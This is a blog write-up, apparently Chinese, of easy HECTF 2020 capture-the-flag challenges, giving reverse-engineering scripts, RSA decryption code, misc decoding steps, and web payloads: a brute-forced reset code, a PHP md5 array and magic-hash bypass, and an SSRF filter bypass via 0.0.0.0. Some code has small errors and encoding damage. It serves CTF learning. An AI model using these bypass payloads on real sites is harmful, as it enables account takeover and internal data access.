hectf2020部分簡單題題解wp
阿新 • • 發佈:2020-11-24
⭐HECTF
我真是又菜又沒時間肝題。。又又又只水了波簡單題。。。
⭐Reverse
1、Hello_Re
file查一波 32bit,拖進IDA中 老規矩shift+F12 檢視字串:
跳轉 F5檢視
scanf("%s", &v4);
if ( strlen(&v4) == 25 && judge0(&v4, 26) )
puts("Congratulations! You found the flag!");
雙擊 judge0 進入:
if ( *a1 != 67 ) goto LABEL_12; if ( a1[1] != 84 ) return 0; if ( a1[2] == 70 && a1[3] == 123 && a1[24] == 125 && judge1(a1) ) result = 1; else LABEL_12: result = 0; return result;
可以看到: 最後解出來的flag 前四位鐵定是 ASCII為 : 76 84 70 123 最後一位為 125
即:
CTF{20個字元}
繼續雙擊judge1跳轉
for ( i = 0; i <= 25; ++i ) { if ( *(_BYTE *)(i + a1) ) *(_BYTE *)(i + a1) ^= (_BYTE)i + 1; } for ( j = 0; j <= 25; ++j ) { if ( *(char *)(j + a1) != arr[j] ) return 0; } return 1;
很顯然 arr[j] 是個關鍵陣列,先是對陣列a1進行異或處理,再把 把陣列a1賦值陣列arr。因此我們只要搞清楚
陣列arr是什麼,再對其進行一次異或處理即可。
雙擊進入,建議和Hex視窗結合起來看
【踩坑】以下是 IDA6.6老版本顯示,與我上面所用的7.0版本顯示不同。
一開始一直把空的那個 當成 ' ' 來處理,但是得到的flag是不正確的。後來經過版本考察,要當成 '',即6.6版本中的樣子。 最後指令碼如下:
#include <stdio.h> #include <stdlib.h> int main() { char arr[25] = {'B','V','E','','2','n','N','=','V',';','x','S','L','O','P','b','t','s','','K','s','!','V','','d'}; int i; int a1[25]; for ( i = 0; i <= 25; ++i ){ *(char *)(i + a1)= arr[i]; } for(i=0;i<=25;i++){ if(*(int*)(a1+i)) *(int*)(a1+i)^=(int)i + 1; printf("%c",a1[i]); } return 0; }
得到flag 為:
CTF{7hI5_1s_AA_real_f7Ag}
2、game1
file一波 發現是32bit ,拖進IDA 。shift+12檢視字串
點選進入。 F5檢視虛擬碼:
int __cdecl flag(int *a1)
{
int result; // eax
signed int v2; // [esp+14h] [ebp-14h]
signed int i; // [esp+18h] [ebp-10h]
int v4; // [esp+1Ch] [ebp-Ch]
v2 = strlen(_data_start__);
for ( i = 0; i < v2; ++i )
{
if ( _data_start__[i] <= 96 || _data_start__[i] > 122 )
{
if ( _data_start__[i] <= 64 || _data_start__[i] > 90 )
LOBYTE(v4) = _data_start__[i];
else
v4 = (_data_start__[i] - 65 + a1[i % 5]) % 26 + 97;
}
else
{
v4 = (_data_start__[i] - 97 + a1[i % 5]) % 26 + 65;
}
_data_start__[i] = v4;
}
gotoxy(24, 5);
color(20);
if ( _data_start__[0] != 72
|| _data_start__[1] != 69
|| _data_start__[2] != 67
|| _data_start__[3] != 84
|| _data_start__[4] != 70 )
{
result = printf("No! you're cheating!");
}
else
{
result = printf("You win! The flag is %s ", _data_start__);
}
return result;
}
注意到 _data_start__ 是個關鍵。flag就在其中。 雙擊 檢視,得到
bxukv{pW1SiFW_J0_jV}
很顯然 這是原始資料,也就是說 bxukv{pW1SiFW_J0_jV} 這串字串經過編碼 變為flag
也很明顯, 最後驗證鍾 寫了開頭五個字元 其ASCII為 : 72、69、67、84、70 即為
HECTF
而 在上述編碼過程鍾,出現的a1[i % 5]恰好可以通過bxukv與HECTF相對應得到
搞清其原理,話不多說,直接上指令碼:
data = 'bxukv{pW1SiFW_J0_jV}'
str = 'HECTF'
a1 = []
len = len(data)
for i in range(0,5):
m = ord(str[i:i+1:1])-65-ord(data[i:i+1:1])+97
if (m<0):
m+=26
a1.append(m)
得到 a1 [6,7,8,9,10]
data = 'bxukv{pW1SiFW_J0_jV}'
str = 'HECTF'
a1 = [6,7,8,9,10]
len = len(data)
flag =''
# for i in range(0,5):
# m = ord(str[i:i+1:1])-65-ord(data[i:i+1:1])+97
# if (m<0):
# m+=26
# a1.append(m)
for i in range(0,len):
n = ord(data[i:i+1:1])
if (n<=96 or n>122):
if (n <=64 or n >90):
flag+= chr(n)
else:
flag+= chr((n-65+a1[i%5]) % 26 +97)
else:
flag+= chr((n-97+a1[i%5]) % 26 +65)
print(flag)
跑出flag
HECTF{We1cOme_t0_Re}
⭐web
1、簽到
點進進入看到一個登入介面
ctrl+u 檢視原始碼, 發現 <!-- 15970773575 --> 得到手機號碼 15970773575
之後,點選 忘記密碼,跳轉到 /findpass.php 頁面。
也是檢視原始碼,發現傳送驗證碼功能子虛烏有。 看來 四位數驗證碼 是爆破密碼的線索。
對其進行抓包, 爆破
於是 將 233 驗證碼輸入,便跳轉到 updatepassword.php 頁面
自己修改密碼,用新密碼登入即可拿到flag
HECTF{a9a102c0c06fcf6c8072c30f0a52f1f2}
2、ezphp
<?php
error_reporting(0);
highlight_file(__file__);
include('flag.php');
$string_1 = $_GET['str1'];
$string_2 = $_GET['str2'];
if($_GET['param1']!==$_GET['param2']&&md5($_GET['param1'])===md5($_GET['param2'])){
if(is_numeric($string_1)){
$md5_1 = md5($string_1);
$md5_2 = md5($string_2);
if($md5_1 != $md5_2){
$a = strtr($md5_1, 'cxhp', '0123');
$b = strtr($md5_2, 'cxhp', '0123');
if($a == $b){
echo $flag;
}
else {
die('you are close');
}
}
else {
die("md5 is wrong");
}
}
else {
die('str1 not number');
}
}
else {
die('you are wrong!');
}
?>
you are wrong!
這裡有兩個考點。 第一個就是得繞過
$_GET['param1']!==$_GET['param2']&&md5($_GET['param1'])===md5($_GET['param2'])
注意,這裡是 !== 和 === 是強比較,我們可以利用陣列繞過
即: error===error ,那麼payload為:
param1[]=1¶m2[]=2
第二個考點就是md5比較
# is_numeric($string_1)
$a = strtr($md5_1, 'cxhp', '0123');
$b = strtr($md5_2, 'cxhp', '0123');
if($a == $b){
echo $flag;
}
得找到一個數 md5加密後 開頭是 ce 這樣就可以轉換到 0e
即: a與b均為 0e開頭 繞過相等
md5加密後以0E開頭:
- QNKCDZO
- 240610708
- s878926199a
- s155964671a
- s214587387a
- s214587387a
則:payload為:
str1=9427417&str2=QNKCDZO
最後的payload就是:
http://121.196.32.184:8081/index.php?param1[]=1¶m2[]=2&str1=9427417&str2=QNKCDZO
得到flag:
hectf{b0c65ccf32a96a1f8dc3326f16ed4498}
3、ssrfme
<?php
error_reporting(0);
highlight_file(__FILE__);
//try flag.php
function filter($url) {
$match_result=preg_match('/^(http|https)?:\/\/.*(\/)?.*$/',$url);
if (!$match_result)
{
die('url fomat error');
}
try
{
$url_parse=parse_url($url);
}
catch(Exception $e)
{
die('url fomat error');
return false;
}
$hostname=$url_parse['host'];
$ip=gethostbyname($hostname);
$int_ip=ip2long($ip);
return ip2long('127.0.0.0')>>24 == $int_ip>>24 || ip2long('10.0.0.0')>>24 == $int_ip>>24 || ip2long('172.16.0.0')>>20 == $int_ip>>20 || ip2long('192.168.0.0')>>16 == $int_ip>>16;
}
$url = $_GET['url'];
if(!filter($url)){
echo file_get_contents($url);
}
?> url fomat error
構造payload:
?url=http://0.0.0.0/flag.php
得到:
flag{04f3eaef-ec7c-4a44-8b54-062cd19295f3}
⭐misc
1、簽到題
直播間即可。
2、png
下載得到一個png 放進010editor 發現最後有一串base64字串
M2I3OWJkZjhmY2ZkNTVmZH0=
得到:
3b79bdf8fcfd55fd}
顯然是後部分的flag
接下來就是要尋找前部分。嘗試修改圖片高度-----
果然,前部分就出來了。
flag為:
flag{94ed7fdae8f504743b79bdf8fcfd55fd}
3、不說人話
很清楚得到 ook!編碼
..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... ..... .....
!.!!! !!!!. !!!!! .?... ..... .!?!! .?... ..... ?.?!. ?..!. ?.... ...!?
!!.?! !!!!! ?.?!. ?!!!! !!!!! !!.?. ..... ..... ....! ?!!.? ..... .....
....? .?!.? ..... ...!. ?.... ..... ....! ?!!.? !!!!! !!!!! !!?.? !.?!!
!!!!! .?... ....! ?!!.? !!!!! !?.?! .?!!! !!!!. ?.... ..... !?!!. ?!!!!
!!!!? .?!.? !!!!! !!!!! !!!!! .?... ..... ..... ....! ?!!.? ..... .....
..... .?.?! .?... .!.?. ..... ...!? !!.?! !!!!! !!?.? !.?!! !!!!! !!.?.
..... ..... ..!?! !.?!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!!!! !!!!! !!.?.
..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ...!. ?.... .....
!?!!. ?!!!! !!!!? .?!.? !!!!! !!!!. ..... ...!. ?.... ...!? !!.?. .....
?.?!. ?.... ..... ...!. ..... ..... ....! .!!!! !!!!! !!!!! !!!!! .....
....! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!!
!.?.. ..... ..... .!?!! .?... ..... ....? .?!.? ..... ..... ..... .....
..!.? ..... ..... ...!? !!.?! !!!!! !!!!! !?.?! .?!!! !!.!! !!!!! !!!!!
!!!!! ..... ..!.? ..... ..... ..... !?!!. ?.... ..... ..... ?.?!. ?....
..... ..... ....! .?... ....! ?!!.? !!!!! !?.?! .?!!! .!!!! !!!.? .....
..... ..... !?!!. ?!!!! !!!!! !!!!! ?.?!. ?!.?. ..... ..... ..... .!?!!
.?... ..... ..... ...?. ?!.?. ..... ..... ..... ..... ..... !.?.
HECTF{TH1s_1s_crypt0_914nda0}
⭐crypto
1、rsa
下載得到 n、e、c
n = 11419768903339716189261532371559705252086398275876008505047375123074727093589680611869748263351554093957968142343831331654606932684767042958427409579115435445187908134556329979271179879129295667476493886787230948520371350715808988496083694717544298343260369816980228394498856751096191942011545898984240281874509791880690092840536597771674772617299407710771426964764347566008897012753022763270832647775571317162594044338095870404550665457899223394942640876850692848671826594750236910363027949459768124646230555766323417693441861436560072288812137944884954974348317322412816157152702695143094487806945533233359294549423
e = 65537
c = 575061710950381118206735073806398116370706587076775765253483131078316908073202143802386128272374323616239083134747318254436706806781744501903333604772961927966747648954315962269321297121495398057938617145017999482722197661065698707836824505023856306403892307944203245563411961302499347604417024064678999003637933185177922884103362203639349298263339808508185861692596967147081382566246627668898774233029198694500565511361867375668367875805985660705137109665107860799277624050210666866958502948062330037309873148963011192405012811945540153592090345668265964477204465327474208098404082920129178960510763496025906621820
分解n得到p、q
跑指令碼:
import libnum
from Crypto.Util.number import long_to_bytes
c = 575061710950381118206735073806398116370706587076775765253483131078316908073202143802386128272374323616239083134747318254436706806781744501903333604772961927966747648954315962269321297121495398057938617145017999482722197661065698707836824505023856306403892307944203245563411961302499347604417024064678999003637933185177922884103362203639349298263339808508185861692596967147081382566246627668898774233029198694500565511361867375668367875805985660705137109665107860799277624050210666866958502948062330037309873148963011192405012811945540153592090345668265964477204465327474208098404082920129178960510763496025906621820
e = 65537
q = 2499568793
p = 4568695582742345507136251229217400959960856046691733722988345503429689799935696593516299458516865110324638359470761456115925725067558499862591063153473862179550706262380644940013531317571260647226561004191266100720745936563550699000939117068559232225644277283541933064331891245169739139886735615435506152070330233107807124410892978280063993668726927377177983100529270996547002022341628251905780873531481682713820809147098305289391835297208890779643623465917824350382592808578978330348769060448006691307027594085634520759293965723855183484366752511654099121387261343686017189426761536281948007104498017003911
n = q * p
d = libnum.invmod(e, (p - 1) * (q - 1))
m = pow(c, d, n) # m 的十進位制形式
string = long_to_bytes(m) # m明文
print(string) # 結果為 b‘ m ’ 的形式
#print(libnum.n2s(m)) #(n2s將數值轉化為字串)
得到flag:
flag{8fb873baba0df4a6423be9f4bd525d93}
大佬們輕噴。。。下次一定一定一定好好肝!!!
【轉載請放連結】 https://www.cnblogs.com/Jlay/p/HECTF_2020_eywp.html